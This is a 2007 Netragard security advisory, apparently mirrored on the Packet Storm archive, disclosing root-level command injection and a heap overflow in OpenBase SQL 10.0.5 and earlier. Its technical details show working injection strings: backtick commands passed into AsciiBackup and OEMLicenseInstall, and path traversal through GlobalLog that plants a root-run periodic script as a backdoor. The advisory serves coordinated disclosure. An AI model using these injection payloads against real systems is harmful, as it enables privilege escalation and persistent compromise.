exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netragard Security Advisory 2007-03-13

Netragard Security Advisory 2007-03-13
Posted Nov 6, 2007
Authored by Kevin Finisterre, Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Netragard's SNOsoft Research Team discovered two critical vulnerabilities in the OpenBase SQL Relational Database that can lead to full system compromise. OpenBase versions 10.0.5 and below are affected.

tags | advisory, vulnerability
SHA-256 | 461394d46dce182dddd5cd5ac8284bec3acbe0ca019c1b7a15477e4a510c19e6

Netragard Security Advisory 2007-03-13

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

********************** Netragard, L.L.C Advisory**********************
Penetration Testing, Vulnerability Assessments, Web Application Security

Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
- --------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com


[Advisory Information]
- --------------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name : OpenBase SQL Relational Database
Product Version : <= OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort : Easy

[Product Description]
- --------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide."

- -- http://openbase.com/home-Aboutus.html --

[Technical Summary]
- --------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered in Buffer Overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.


[Technical Details]
- --------------------------------------------------------------------------
1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root

An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name which will and trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected
system.


[Proof Of Concept]
- --------------------------------------------------------------------------
See Above

[Vendor Status]
- --------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

"OpenBase now runs as the 'openbase' user for security reasons. I would
like to publically thank Kevin Finisterre for his input."

[Disclaimer]
- ------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHL3dgQwbn1P9Iaa0RAkTrAKChtXX9q5LcP5m9DRb2SYZ1E0JipgCfaDXn
yu4Rt3X3CIzaDSJJm+SWUwo=
=EQxH
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close